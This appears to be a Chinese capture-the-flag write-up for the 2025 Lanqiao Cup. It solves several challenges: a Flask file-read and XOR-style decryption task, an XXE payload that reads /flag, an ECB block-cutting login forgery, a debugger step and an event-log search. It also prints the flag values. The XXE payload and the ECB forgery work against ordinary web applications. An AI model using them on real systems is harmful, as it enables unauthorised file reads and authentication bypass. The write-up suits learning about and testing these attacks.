蓝桥杯2025 wp
flowzip
一把梭了
enigma
给的是赛博厨子,那用赛博厨子解密即可
HELLO CTFER THISI SAMES SAGEF ORYOU
黑客密室逃脱
获取app.py
import os
from flask import Flask, request, render_template
from config import *
# author: gamelab
app = Flask(__name__)
# 模拟敏感信息
sensitive_info = SENSITIVE_INFO
# 加密密钥
encryption_key = ENCRYPTION_KEY
def simple_encrypt(text, key):
encrypted = bytearray()
for i in range(len(text)):
char = text[i]
key_char = key[i % len(key)]
encrypted.append(ord(char) + ord(key_char))
return encrypted.hex()
encrypted_sensitive_info = simple_encrypt(sensitive_info, encryption_key)
# 模拟日志文件内容
log_content = f"用户访问了 /secret 页面,可能试图获取 {encrypted_sensitive_info}"
# 模拟隐藏文件内容
hidden_file_content = f"解密密钥: {encryption_key}"
# 指定安全的文件根目录
SAFE_ROOT_DIR = os.path.abspath('/app')
with open(os.path.join(SAFE_ROOT_DIR, 'hidden.txt'), 'w') as f:
f.write(hidden_file_content)
@app.route('/')
def index():
return render_template('index.html')
@app.route('/logs')
def logs():
return render_template('logs.html', log_content=log_content)
@app.route('/secret')
def secret():
return render_template('secret.html')
@app.route('/file')
def file():
file_name = request.args.get('name')
if not file_name:
return render_template('no_file_name.html')
full_path = os.path.abspath(os.path.join(SAFE_ROOT_DIR, file_name))
if not full_path.startswith(SAFE_ROOT_DIR) or 'config' in full_path:
return render_template('no_premission.html')
try:
with open(full_path, 'r') as f:
content = f.read()
return render_template('file_content.html', content=content)
except FileNotFoundError:
return render_template('file_not_found.html')
if __name__ == '__main__':
app.run(debug=True, host='0.0.0.0')hidden.txt
解密密钥: secret_key3624解密即可
encryption_key = "secret_key3624"
def simple_encrypt(text, key):
encrypted = bytearray()
for i in range(len(text)):
char = text[i]
key_char = key[i % len(key)]
encrypted.append(ord(char) + ord(key_char))
return encrypted.hex()
def simple_decrypt(encrypted_text, key):
decrypted = bytearray()
encrypted_bytes = bytes.fromhex(encrypted_text)
for i in range(len(encrypted_bytes)):
byte = encrypted_bytes[i]
key_char = key[i % len(key)]
decrypted.append(byte - ord(key_char))
return decrypted.decode('utf-8')
enc="d9d1c4d9e0aac5a4caa969989661d4cbc8a392a898cdc7a66c6d679aa09a9ca4cbab98a1c6af636668b1"
flag= simple_decrypt(enc, encryption_key)
print(flag)flag{6f9e06bd-afe1-49bb-975f-592f796a6006}
xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE creds [
<!ENTITY goodies SYSTEM "file:///flag"> ]>
<creds>&goodies;</creds>然后即可拿到flag
shadow
打断点
然后看寄存器即可
ECB
先用AAAAAAAAAAAAAAAAadmin注册
得到密文KW7riR/XPwngxZyZVMhtk7hAuF3tGSMt5sLqai55nNE=
base64出hex然后取出后16位进行base64编码
import base64
base="KW7riR/XPwngxZyZVMhtk7hAuF3tGSMt5sLqai55nNE="
ciphertext = base64.b64decode(base)
# 取后16字节
ciphertext = ciphertext[-16:]
ciphertext = base64.b64encode(ciphertext).decode()
print(ciphertext)EVTX
先导出为xml
搜索所有.后面的内容
# 打开文件
import os
import random
file = "C:\\Users\\Lenovo\\Downloads\\e.xml"
if os.path.exists(file):
with open(file, 'r',encoding="utf8") as f:
content = f.read()
#搜索所有.并输出.后的3位,并且去重
import re
pattern = r'\.(\w{3})'
matches = re.findall(pattern, content)
matches = set(matches) # 去重
print(matches) # 打印结果{'exe', '000', '168', 'com', 'mic', 'doc', '100'}
注意到doc,定位原文得到
C:\Admin\confidential.docx
许可协议:
CC BY 4.0